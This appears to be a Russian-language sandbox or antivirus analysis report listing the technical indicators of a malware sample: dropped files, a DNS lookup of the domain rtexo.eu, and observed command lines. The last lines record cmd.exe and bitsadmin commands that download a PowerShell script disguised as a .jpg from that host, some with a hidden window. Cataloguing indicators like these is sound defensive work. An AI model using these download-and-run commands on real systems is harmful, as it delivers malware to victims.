Техническая информация
- C:\users\public\documents\ikgkcigz.lnk
- %WINDIR%\temp\cabe206.tmp
- %WINDIR%\temp\tare207.tmp
- %WINDIR%\temp\cabe227.tmp
- %WINDIR%\temp\tare228.tmp
- %WINDIR%\temp\cabf803.tmp
- %WINDIR%\temp\tarf804.tmp
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\metadata\f0accf77cdcbff39f6191887f6d2d357
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\content\f0accf77cdcbff39f6191887f6d2d357
- %WINDIR%\temp\cabe206.tmp
- %WINDIR%\temp\tare207.tmp
- %WINDIR%\temp\cabe227.tmp
- %WINDIR%\temp\tare228.tmp
- %WINDIR%\temp\cabf803.tmp
- %WINDIR%\temp\tarf804.tmp
- 'rt##o.eu':443
- DNS ASK rt##o.eu (домен частично скрыт символами ##; судя по командным строкам ниже, это rtexo.eu)
- '<SYSTEM32>\cmd.exe' /c c:\Users\Public\Documents\iKGkciGZ.lnk https://rtexo.eu/doc/x2401.jpg c:\Users\Public\Documents\yMbExkIY.ps1 (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c c:\Users\Public\Documents\iKGkciGZ.lnk https://rtexo.eu/doc/x2401.jpg c:\Users\Public\Documents\yMbExkIY.ps1
- '<SYSTEM32>\bitsadmin.exe' /transfer CCteyD /download /priority FOREGROUND https://rtexo.eu/doc/x2401.jpg c:\Users\Public\Documents\yMbExkIY.ps1